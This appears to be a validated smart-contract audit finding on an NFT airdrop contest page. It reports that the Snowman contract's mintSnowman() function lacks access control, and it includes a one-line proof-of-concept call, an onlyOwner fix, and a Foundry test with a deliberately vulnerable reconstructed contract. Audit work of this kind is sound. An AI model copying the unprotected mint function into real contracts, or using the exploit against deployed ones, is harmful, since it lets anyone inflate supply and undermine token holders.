Snowman Merkle Airdrop

First Flight #42
Beginner Friendly · Foundry · Solidity · NFT
100 EXP
Submission Details
Severity: high
Valid

Missing Access Control on mintSnowman() Function

Missing Access Control on mintSnowman() Allows Unlimited Unauthorized NFT Minting – High Impact & High Likelihood

Description

  • The mintSnowman() function is used to mint one or more ERC721 tokens and assign them to a specified receiver address. Normally, such minting functions are restricted to an authorized party (e.g., contract owner or designated minter) to prevent abuse and ensure fair token distribution.

  • However, in the current implementation, mintSnowman() is marked external and carries no access control modifier and no caller check. As a result, any externally owned account or contract can call it and mint an arbitrary number of NFTs to itself or to any other address, bypassing the airdrop's eligibility logic entirely, inflating the supply, and spamming wallets and dApps with unearned tokens.

// Root cause in the codebase with @> marks to highlight the relevant section
function mintSnowman(address receiver, uint256 amount) external {
    for (uint256 i = 0; i < amount; i++) {
@>      _safeMint(receiver, s_TokenCounter);
@>      emit SnowmanMinted(receiver, s_TokenCounter);
@>      s_TokenCounter++;
    }
}

Risk

Likelihood:

  • Exploitable from the moment the contract is deployed: the function is publicly callable on-chain, so anyone who reads the ABI or the verified source can find it immediately.

  • The contract does not validate or restrict the caller in any way, so bots or malicious users can mint at will right after deployment, and can repeat the call as often as they are willing to pay gas for.

Impact:

  • Unlimited unauthorized NFTs can be minted, undermining the rarity, trust, and design of the NFT drop.

  • The token supply can be inflated infinitely, possibly crashing secondary market value and creating spam within wallets or dApps.


Proof of Concept

Assume this contract is deployed at address: 0xABC...

Any user can call the following to mint 1000 NFTs to themselves; there is no check to stop this behavior, and the only bound on the amount per call is the block gas limit, so the caller can simply repeat the transaction:

Snowman(0xABC...).mintSnowman(msg.sender, 1000);

Note that _safeMint() invokes onERC721Received() when the receiver is a contract, so a contract-based attacker must implement that hook; an externally owned account needs nothing extra.

Recommended Mitigation

- function mintSnowman(address receiver, uint256 amount) external {
+ function mintSnowman(address receiver, uint256 amount) external onlyOwner {

This ensures that only the contract deployer (or a future owner via transferOwnership()) can mint new Snowman NFTs, restoring access control and maintaining supply integrity. The contract must inherit OpenZeppelin's Ownable for the modifier to exist. Since minting in this design is meant to happen through the airdrop, the owner should be the airdrop contract (transfer ownership to it after deployment), or a dedicated minter role should be used instead of onlyOwner, so that no other path to mintSnowman() remains open.
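The proof of concept and the mitigation above, as an added Foundry test (example code written for this page, not the Snowman project's own code or tests). The two minimal contracts are assumptions reconstructed from the mintSnowman() snippet in the finding: the real Snowman contract has airdrop logic, token URI handling and other functionality that is omitted here. The fixed variant assumes OpenZeppelin v5, whose Ownable takes an initialOwner constructor argument and reverts with the OwnableUnauthorizedAccount custom error.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Added example, not the Snowman project's own code. SnowmanVulnerable and
// SnowmanFixed are assumed minimal reconstructions around mintSnowman().
import {Test} from "forge-std/Test.sol";
import {ERC721} from "@openzeppelin/contracts/token/ERC721/ERC721.sol";
import {Ownable} from "@openzeppelin/contracts/access/Ownable.sol";

// Vulnerable shape: mintSnowman() is external with no access control.
contract SnowmanVulnerable is ERC721 {
    uint256 private s_TokenCounter;

    event SnowmanMinted(address indexed receiver, uint256 indexed tokenId);

    constructor() ERC721("Snowman", "SNOWMAN") {}

    function mintSnowman(address receiver, uint256 amount) external {
        for (uint256 i = 0; i < amount; i++) {
            _safeMint(receiver, s_TokenCounter);
            emit SnowmanMinted(receiver, s_TokenCounter);
            s_TokenCounter++;
        }
    }

    function totalMinted() external view returns (uint256) {
        return s_TokenCounter;
    }
}

// Hardened shape: the same function restricted to the owner. In the airdrop
// design the owner would be the airdrop contract (or a dedicated minter role).
contract SnowmanFixed is ERC721, Ownable {
    uint256 private s_TokenCounter;

    event SnowmanMinted(address indexed receiver, uint256 indexed tokenId);

    constructor(address initialOwner) ERC721("Snowman", "SNOWMAN") Ownable(initialOwner) {}

    function mintSnowman(address receiver, uint256 amount) external onlyOwner {
        for (uint256 i = 0; i < amount; i++) {
            _safeMint(receiver, s_TokenCounter);
            emit SnowmanMinted(receiver, s_TokenCounter);
            s_TokenCounter++;
        }
    }
}

contract SnowmanMintAccessTest is Test {
    address attacker = makeAddr("attacker"); // an EOA: _safeMint needs no receiver hook
    address deployer = makeAddr("deployer");

    // Exploit: any caller mints 1000 tokens to itself on the vulnerable contract.
    function test_AnyoneCanMintOnVulnerable() public {
        SnowmanVulnerable snowman = new SnowmanVulnerable();

        vm.prank(attacker);
        snowman.mintSnowman(attacker, 1000);

        assertEq(snowman.balanceOf(attacker), 1000);
        assertEq(snowman.totalMinted(), 1000);
    }

    // Fix: the same call from a non-owner reverts; the owner can still mint.
    function test_NonOwnerMintRevertsOnFixed() public {
        SnowmanFixed snowman = new SnowmanFixed(deployer);

        vm.prank(attacker);
        vm.expectRevert(
            abi.encodeWithSelector(Ownable.OwnableUnauthorizedAccount.selector, attacker)
        );
        snowman.mintSnowman(attacker, 1000);
        assertEq(snowman.balanceOf(attacker), 0);

        vm.prank(deployer);
        snowman.mintSnowman(attacker, 1);
        assertEq(snowman.balanceOf(attacker), 1);
    }
}
```

Run with `forge test --match-contract SnowmanMintAccessTest -vv` in a Foundry project that has forge-std and openzeppelin-contracts installed. The first test is the finding's PoC; the second is the check that the onlyOwner patch actually closes it and does not break legitimate owner minting.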

Updates

Lead Judging Commences

yeahchibyke Lead Judge 3 months ago
Submission Judgement Published
Validated
Assigned finding tags:

Unrestricted NFT mint function

The mint function of the Snowman contract is unprotected. Hence, anyone can call it and mint NFTs without necessarily partaking in the airdrop.
